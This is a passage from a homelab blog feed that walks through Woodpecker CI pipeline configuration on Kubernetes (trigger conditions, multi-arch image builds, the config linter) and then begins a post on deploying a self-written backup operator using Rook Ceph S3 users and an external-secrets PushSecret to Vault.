</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">hugo</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Missing alt text check</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">python:3</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">pip install lxml beautifulsoup4</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">python3 scripts/alt_text.py ./public/posts/</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Hugo Site Upload</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#e6db74">&#34;harbor.mei-home.net/homelab/hugo:latest&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">environment</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">AWS_ACCESS_KEY_ID</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">from_secret</span>: <span style="color:#ae81ff">access-key</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">AWS_SECRET_ACCESS_KEY</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">from_secret</span>: <span style="color:#ae81ff">secret-key</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">s3cmd -c /s3cmd.conf sync -r --delete-removed --delete-after --no-mime-magic ./public/ s3://blog/</span>
</span></span></code></pre></div><p>To start with, the page needs to be built, using Hugo in an image I build
myself, based on Alpine with a couple of tools installed. Then I&rsquo;m running
a short Python script which uses <a href="https://pypi.org/project/beautifulsoup4/">beautifulsoup4</a>
to scan through the generated HTML and make sure that each image has alt text,
and that there&rsquo;s actually something in that alt text. Finally, I push the
generated site up to an S3 bucket in my Ceph cluster from where it is served.</p>
<p>The <code>when:</code> at the beginning is important: it determines under which
conditions the pipeline is executed. This can be configured for specific
branches or certain events, like a push or an update of a pull request.
The different conditions can also be combined. In addition to configuring
conditions on the entire pipeline, they can also be configured just on
certain steps, as we will see later.</p>
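<p>As a small sketch of what such a condition can look like (not one of my actual
configs), a pipeline that should only run for pushes to the <code>master</code> branch
could start like this:</p>
<pre tabindex="0"><code>when:
  - event: push
    branch: master
</code></pre>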
<p>One thing I find a little bit lacking at the moment, specifically for the
Kubernetes use case, is the secrets management. It&rsquo;s currently only possible
via the web UI or the CLI. There&rsquo;s no way to provide specific Kubernetes Secrets to
certain steps in a certain pipeline. But there is an open issue to implement
support for Kubernetes Secrets <a href="https://github.com/woodpecker-ci/woodpecker/issues/3582">on Github</a>.
Until that is implemented, the UI needs to be used. It looks like this:
<figure>
    <img loading="lazy" src="secrets.png"
         alt="A screenshot of Woodpecker&#39;s secret configuration UI. It contains a field for a name for the secret and values. In addition, it can be made available only for certain images used in steps. Furthermore, the secret can be restricted to certain events triggering a pipeline run, e.g. only Pushes or Tags or Pull Requests."/> <figcaption>
            <p>Woodpecker&rsquo;s secret addition UI.</p>
        </figcaption>
</figure>

Secrets can be configured for specific repositories, for specific orgs where the
forge supports them, and globally for all pipelines.</p>
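<p>For completeness, the CLI route looks roughly like the following. I&rsquo;m writing
this from memory, so treat the exact flags as an assumption and check
<code>woodpecker-cli secret add --help</code>:</p>
<pre tabindex="0"><code># the secret name matches the from_secret reference used in the pipeline;
# the variable holding the value is just a placeholder
woodpecker-cli secret add \
  --repository mmeier/blog \
  --name access-key \
  --value &#34;$MY_ACCESS_KEY&#34;
</code></pre>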
<p>When looking at a specific repository, all of the pipelines which ran for it
are listed:
<figure>
    <img loading="lazy" src="pipeline_list.png"
         alt="A screenshot of the pipeline list for the mmeier/blog repository. It shows four pipelines. The first one is called &#39;CI: Migrate to Woodpecker&#39; and the most recent one &#39;Publish post on hl-backup-operator deployment&#39;. All of them show that they were pushed directly to the Master branch and took about 1 - 2 minutes each. Each pipeline also shows the Git SHA1 of the commit it tested."/> <figcaption>
            <p>Woodpecker&rsquo;s pipeline list for my blog repo.</p>
        </figcaption>
</figure>

This gives a nice overview of the pipelines which ran recently, here with the
example of my blog repository, including the most recent run for publishing
the post on the backup operator deployment.</p>
<p>Clicking on one of the pipeline runs then shows the overview of that pipeline&rsquo;s
steps and the step logs:
<figure>
    <img loading="lazy" src="pipeline_example.png"
         alt="A screenshot of the pipeline run publishing the hl-backup-operator blog article. At the top right is the subject line of the commit message triggering the pipeline again, &#39;Publish post on hl-backup-operator deployment&#39;. On the left is a list of the steps, showing &#39;clone&#39;, &#39;Hugo Site Build&#39;, &#39;Missing alt text check&#39;, &#39;Hugo Site Upload&#39;. The &#39;Hugo Site Build&#39; step is highlighted, and the logs for that step, showing Hugo&#39;s build output, are shown on the right side."/> <figcaption>
            <p>Woodpecker&rsquo;s pipeline view.</p>
        </figcaption>
</figure>
</p>
<p>This pipeline is not very complex and runs through in about two minutes. So
let&rsquo;s have a look at another pipeline with a bit more complexity.</p>
<h3 id="docker-repo-example">Docker repo example</h3>
<p>Another repository where I&rsquo;m making quite a bit of use of CI is my Docker repository.
In that repo, I&rsquo;ve got a couple of Dockerfiles for cases where I&rsquo;m adding something
to upstream images or building my own where no upstream container is available.</p>
<p>This repository&rsquo;s CI is a bit more complicated, mostly because it does the same
thing for multiple different Dockerfiles, and because it needs to do different
things for pull requests and commits pushed to the Master branch.</p>
<p>And that&rsquo;s where the problems begin, at least to a certain extent. As I&rsquo;ve shown
above, you can provide a <code>when</code> config to tell Woodpecker under which conditions
to run the pipeline. And if you leave that out completely, you don&rsquo;t end up
with the pipeline being run for all commits. No. You end up with the pipeline being
run twice for some commits.</p>
<p>Consider, for example, this configuration:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">steps</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">build image</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">woodpeckerci/plugin-docker-buildx:latest-insecure</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">settings</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&lt;&lt;</span>: <span style="color:#75715e">*dockerx-config</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">dry-run</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">event</span>: <span style="color:#ae81ff">pull_request</span>
</span></span></code></pre></div><p>Ignore the config under settings, and concentrate on the fact that there&rsquo;s no
<code>when</code> config on the pipeline level, only on the step level. And there&rsquo;s only
one step, which is supposed to run on pull requests. The result of this config
is that two pipelines will be started - including Pod launches, PVC creation
and so on:
<figure>
    <img loading="lazy" src="doubled_pipelines.png"
         alt="A screenshot of Woodpecker showing two pipelines. One failed, one successful. Both show being run for the same commit. One shows that it was launched by a push event to the &#39;woodpecker-ci&#39; branch and the other that it was pushed to pull request 77."/> <figcaption>
            <p>The two pipelines started for the previous configuration, both for the same commit.</p>
        </figcaption>
</figure>

Pipeline <em>#1</em> was launched for the &ldquo;push&rdquo; event to the <em>woodpecker-ci</em> branch,
and the other for the update of the pull request that push belonged to. The push
event pipeline only launched the <em>clone</em> step, while the pull request pipeline
launched the <em>build image</em> step and the clone step.</p>
<p>The root cause for this behavior is that Gitea always triggers the webhook for
all fitting events, one for each event. And consequently, Woodpecker then
launches one pipeline for each event.</p>
<p>A similar effect can be observed when combining both pull request and push
events in one <code>when</code> clause on the pipeline level.</p>
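<p>In other words, a pipeline-level clause along these lines also gets you two
pipelines for every commit that is part of a pull request:</p>
<pre tabindex="0"><code>when:
  - event: push
  - event: pull_request
</code></pre>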
<p>Now, you might be saying: Okay, then just configure the triggers only on the
steps, not on the entire pipeline. But that also doesn&rsquo;t really work. Without
a <code>when</code> clause, as shown above, two pipelines are always started for commits
in pull requests. And even though one of the pipelines won&rsquo;t do much, it would
still do something. In my case, it would launch a Pod for the clone step and
also create a PVC and clone the repo - for nothing.</p>
<p>The next idea I came up with: Okay, then let&rsquo;s set the pipeline&rsquo;s <code>when</code> to trigger
on push events, because that would trigger the pipeline for both - pushes to
branches like master and pushes to pull requests. And then just add <code>when</code>
clauses to each step with either the pull request or push event, depending on
when it is supposed to run.
But that also won&rsquo;t work - any given pipeline only ever sees one event. If I
trigger on push events on the pipeline level, the steps triggering on the
pull request event will never trigger.</p>
<p>I finally figured out a way to do this. I always trigger the pipeline on push
events. And then I use Woodpecker&rsquo;s <a href="https://woodpecker-ci.org/docs/usage/workflow-syntax#evaluate">evaluate clause</a>
on the individual steps to run them only for certain branches.</p>
<p>With all of that said, this is what the config is looking like for the pipeline
which builds my Hugo container:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">event</span>: <span style="color:#ae81ff">push</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">path</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#39;.woodpecker/hugo.yaml&#39;</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#39;hugo/*&#39;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">variables</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#75715e">&amp;alpine-version</span> <span style="color:#e6db74">&#39;3.21.2&#39;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#75715e">&amp;app-version</span> <span style="color:#e6db74">&#39;0.139.0-r0&#39;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#75715e">&amp;dockerx-config</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">debug</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">repo</span>: <span style="color:#ae81ff">harbor.example.com/homelab/hugo</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">registry</span>: <span style="color:#ae81ff">harbor.example.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#ae81ff">ci</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">password</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">from_secret</span>: <span style="color:#ae81ff">container-registry</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">dockerfile</span>: <span style="color:#ae81ff">hugo/Dockerfile</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">context</span>: <span style="color:#ae81ff">hugo/</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mirror</span>: <span style="color:#ae81ff">https://harbor-mirror.example.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">buildkit_config</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      debug = true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      [registry.&#34;docker.io&#34;]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mirrors = [&#34;harbor.example.com/dockerhub-cache&#34;]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      [registry.&#34;quay.io&#34;]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mirrors = [&#34;harbor.example.com/quay.io-cache&#34;]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      [registry.&#34;ghcr.io&#34;]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mirrors = [&#34;harbor.example.com/github-cache&#34;]</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">latest</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#75715e">*app-version</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build_args</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">hugo_ver</span>: <span style="color:#75715e">*app-version</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">alpine_ver</span>: <span style="color:#75715e">*alpine-version</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">platforms</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#34;linux/amd64&#34;</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#34;linux/arm64&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">steps</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">build image</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">woodpeckerci/plugin-docker-buildx:latest-insecure</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">settings</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&lt;&lt;</span>: <span style="color:#75715e">*dockerx-config</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">dry-run</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">evaluate</span>: <span style="color:#e6db74">&#39;CI_COMMIT_BRANCH != CI_REPO_DEFAULT_BRANCH&#39;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">release image</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">woodpeckerci/plugin-docker-buildx:latest-insecure</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">settings</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&lt;&lt;</span>: <span style="color:#75715e">*dockerx-config</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">dry-run</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">evaluate</span>: <span style="color:#e6db74">&#39;CI_COMMIT_BRANCH == CI_REPO_DEFAULT_BRANCH&#39;</span>
</span></span></code></pre></div><p>First, what does this pipeline do for pull requests and main branch pushes?
For pull requests, it uses the <a href="https://woodpecker-ci.org/plugins/Docker%20Buildx">buildx plugin</a>
to build a Docker image from the Dockerfile at <code>hugo/Dockerfile</code> in the repository.
That&rsquo;s what happens in the <em>build image</em> step. Notably, no push to a registry
happens here.
In the case of pushes to the repo&rsquo;s default branch, which is provided by Gitea
in the webhook call, the same plugin and build are used, but this time the
newly built images are pushed to my Harbor registry. For more details on that
setup, <a href="https://blog.mei-home.net/posts/k8s-migration-11-harbor/">see this post</a>.</p>
<p>In the <code>when</code> clause for the pipeline, as I&rsquo;ve explained above, I&rsquo;m triggering
on the push event, to circumvent the problem with multiple pipelines being
executed for commits in pull requests.
In addition, I&rsquo;m also making use of path-based triggers. Because I&rsquo;ve got multiple
container images defined in one repository, I&rsquo;d like to avoid unnecessarily running
builds for images which haven&rsquo;t changed. That&rsquo;s done by triggering the
pipeline only on changes in its own config file and changes in the <code>hugo/</code> directory.
So if the Hugo image definition and CI config haven&rsquo;t changed, the pipeline won&rsquo;t
be triggered.</p>
<p>As you can see, I&rsquo;m building images for both AMD64 and ARM64. And before I
close this section, I have to tell a slightly embarrassing story. I initially
tried to run two pipelines - one for each architecture, so that they could
both run in parallel on different nodes fitting their architecture. This would
avoid the cost of emulating a foreign architecture, making the builds faster
overall.
This seemed like an excellent idea. And it worked really, really well. The
pipelines got a couple of minutes faster. Until I had a look at my Harbor
instance. And as some of you might have already figured out, I found that of
course there was not one tag with images for both architectures.
Instead, the tag contained the image from whichever pipeline finished last. Because of course,
two different Docker pushes overwrite each other instead of being merged.
This is a problem I need to have another look at later. Someone on the Fediverse
already showed me that there is a multistep way to do this manually.</p>
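<p>I haven&rsquo;t tried it yet, but from what I understand the manual variant boils down
to pushing each architecture under its own tag and then stitching those together
into a single multi-arch tag afterwards, roughly like this (an untested sketch with
made-up tag names, not necessarily what was suggested to me):</p>
<pre tabindex="0"><code># assuming the two pipelines pushed architecture-specific tags first
docker buildx imagetools create \
  -t harbor.example.com/homelab/hugo:latest \
  harbor.example.com/homelab/hugo:latest-amd64 \
  harbor.example.com/homelab/hugo:latest-arm64
</code></pre>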
<p>Another point that I still need to improve is image caching. I think that there&rsquo;s
still some potential for optimization in my setup. But that&rsquo;s also something for
after the k8s migration is done.</p>
<p>Before I close out this section, I would like to point out a pretty nice feature
Woodpecker has: a linter for the pipeline definitions. Here is an example of its output:</p>
<figure>
    <img loading="lazy" src="linter.png"
         alt="A screenshot of Woodpecker&#39;s linter output. It shows a number of issues with the pipeline config. For example that steps.1.environment and steps.2.environment are both of an invalid type. It expected an array, but got a null. And for all of the steps it outputs a &#39;bad_habit&#39; warning about the fact that neither the pipeline nor any of the steps have a &#39;when&#39; clause."/> <figcaption>
            <p>Example output of Woodpecker&rsquo;s config linter.</p>
        </figcaption>
</figure>

<p>The configuration spitting out those warnings is this one for my blog:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">steps</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">submodules</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">alpine/git</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">git submodule update --init --recursive</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Hugo Site Build</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#e6db74">&#34;harbor.example.com/homelab/hugo:0.125.4-r3&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">environment</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">hugo</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Missing alt text check</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">python:3</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">environment</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">pip install lxml beautifulsoup4</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">python3 scripts/alt_text.py ./public/posts/</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Hugo Site Upload</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#e6db74">&#34;harbor.example.com/homelab/hugo:latest&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">environment</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">AWS_ACCESS_KEY_ID</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">from_secret</span>: <span style="color:#ae81ff">access-key</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">AWS_SECRET_ACCESS_KEY</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">from_secret</span>: <span style="color:#ae81ff">secret-key</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">s3cmd -c /s3cmd.conf sync -r --delete-removed --delete-after --no-mime-magic ./public/ s3://blog/</span>
</span></span></code></pre></div><p>The main issues are the empty <code>environment</code> keys, as well as the fact that I did
not set any <code>when</code> clause.</p>
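<p>The fix is correspondingly simple: drop the empty <code>environment:</code> keys and add
a <code>when</code> clause, for example on the pipeline level, like in the blog config shown
further up:</p>
<pre tabindex="0"><code>when:
  - event: push

steps:
  - name: Hugo Site Build
    image: &#34;harbor.example.com/homelab/hugo:0.125.4-r3&#34;
    commands:
      - hugo
  # ... remaining steps unchanged, minus the empty environment keys
</code></pre>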
<h2 id="conclusion">Conclusion</h2>
<p>And that&rsquo;s it. Again a pretty long one, but I had never written about my CI setup
and wanted to take this chance to do so, also because I had gotten some
questions on the Fediverse asking what a CI actually does, and some interest
in what Woodpecker looks like.</p>
<p>Oh and also, I just have a propensity for long-winded writing. &#x1f605;</p>
<p>With this post, the Woodpecker/CI migration to k8s is done, and I&rsquo;m quite happy
with it. Especially the fact that my CI pipeline steps now get distributed over
the entire cluster instead of just running on the nodes with the agents.</p>
<p>For the next step I will likely take my Gitea instance and migrate it over, but
as this blog post took longer than I thought it would, it might have to wait
until next weekend.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 14: Deploying the Backups</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-14-backup-operator/</link>
      <pubDate>Thu, 23 Jan 2025 21:50:30 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-14-backup-operator/</guid>
      <description>Deploying my backup operator into the cluster</description>
      <content:encoded><![CDATA[<p>Wherein I&rsquo;m finally done with the backups in my Homelab&rsquo;s k8s cluster.</p>
<p>This is part 14 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>Finally, I&rsquo;m done. After months of writing Python code for my backup operator.
Especially during the middle phase of the implementation, after the initial
planning and design, it felt like a slog. Dozens of tasks, many functions to
implement, and seemingly no end in sight. I&rsquo;m rather elated to finally be able
to write another post in the k8s migration series.</p>
<p>In this post, I will not write much about how the operator is implemented.
Instead, I will give it the same treatment I gave the other apps I&rsquo;ve deployed
into the cluster up to now, as if I hadn&rsquo;t written it myself.</p>
<p>If you&rsquo;re interested in the implementation, take a look at the
<a href="https://blog.mei-home.net/tags/hlbo/">series of posts</a> I wrote about it.</p>
<p>Suffice it to say for now that the operator reads a CRD defining some S3 buckets
and PersistentVolumeClaims to be backed up, and launches Pods which use rclone
and restic to do just that.</p>
<h2 id="infrastructure-preparation">Infrastructure Preparation</h2>
<p>Besides the backup operator itself, I also need some additional infrastructure.
The backups themselves use restic with an S3 bucket as a target. I&rsquo;m going with
one bucket per app here. So before I can run the first backups, I need a couple
of S3 users and buckets.</p>
<p>If you would like to read a bit more about my S3 setup, have a look at
<a href="https://blog.mei-home.net/posts/k8s-migration-5-s3-buckets/">this post</a></p>
<p>The first two things needed are the <code>backups</code> and <code>service-backup-user</code> users.
The <code>backups</code> user is the owner of all of the backup buckets, while
<code>service-backup-user</code> is a reduced-permissions user for the actual backups:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">ceph.rook.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CephObjectStoreUser</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backups</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">store</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">clusterNamespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">displayName</span>: <span style="color:#e6db74">&#34;Common user for backup buckets&#34;</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">ceph.rook.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CephObjectStoreUser</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">service-backup-user</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">store</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">clusterNamespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">displayName</span>: <span style="color:#e6db74">&#34;User for service backups&#34;</span>
</span></span></code></pre></div><p>With these two manifests, <a href="https://rook.io/">Rook Ceph</a> will create two S3
users in my bulk storage, which is the part of my Ceph cluster backed by HDDs.</p>
<p>Because I&rsquo;m doing the bucket management itself through Ansible,
I also need to push these users&rsquo; credentials to my <a href="https://www.vaultproject.io/">Vault</a>
instance, to make them available during Ansible runs. Although, now that I&rsquo;m
writing this, I&rsquo;m wondering whether Ansible has a k8s Secrets lookup plugin?
Something to look into later.</p>
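<p>As a small aside to that question: the <code>kubernetes.core</code> collection does ship a
<code>k8s</code> lookup plugin, so something along these lines might work instead of the Vault
round-trip. This is an untested sketch on my part and assumes the Ansible controller has
credentials for the cluster:</p>
<pre tabindex="0"><code>vars:
  # Untested sketch: read the Rook-generated Secret straight from the cluster.
  # Whether the lookup returns a single object or a list is something to check.
  rook_secret: &#34;{{ lookup(&#39;kubernetes.core.k8s&#39;, kind=&#39;Secret&#39;, namespace=&#39;rook-cluster&#39;, resource_name=&#39;rook-ceph-object-user-rgw-bulk-backups&#39;) }}&#34;
  # Secret data is base64-encoded, hence the b64decode filter.
  s3_access: &#34;{{ rook_secret.data.AccessKey | b64decode }}&#34;
  s3_secret: &#34;{{ rook_secret.data.SecretKey | b64decode }}&#34;
</code></pre>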
<p>For pushing Secrets to Vault (and creating Secrets from Vault data), I&rsquo;m using
<a href="https://external-secrets.io/latest/">external-secrets</a>.
Specifically, PushSecret in this case:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PushSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">s3-backupsuser</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">deletionPolicy</span>: <span style="color:#ae81ff">Delete</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#ae81ff">30m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRefs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">homelab-vault</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">secret</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>:  <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-backups</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">match</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">remoteKey</span>: <span style="color:#ae81ff">secrets/backups</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">property</span>: <span style="color:#ae81ff">access</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">match</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">remoteKey</span>: <span style="color:#ae81ff">secrets/backups</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">property</span>: <span style="color:#ae81ff">secret</span>
</span></span></code></pre></div><p>As always with secrets-related stuff, this is a bit obfuscated.
What this manifest does is take the Secret automatically created by Rook Ceph at
<code>rook-ceph-object-user-rgw-bulk-backups</code> and push the S3 access key
and secret key to the Vault KV store <code>secrets</code> at the entry <code>backups</code>.</p>
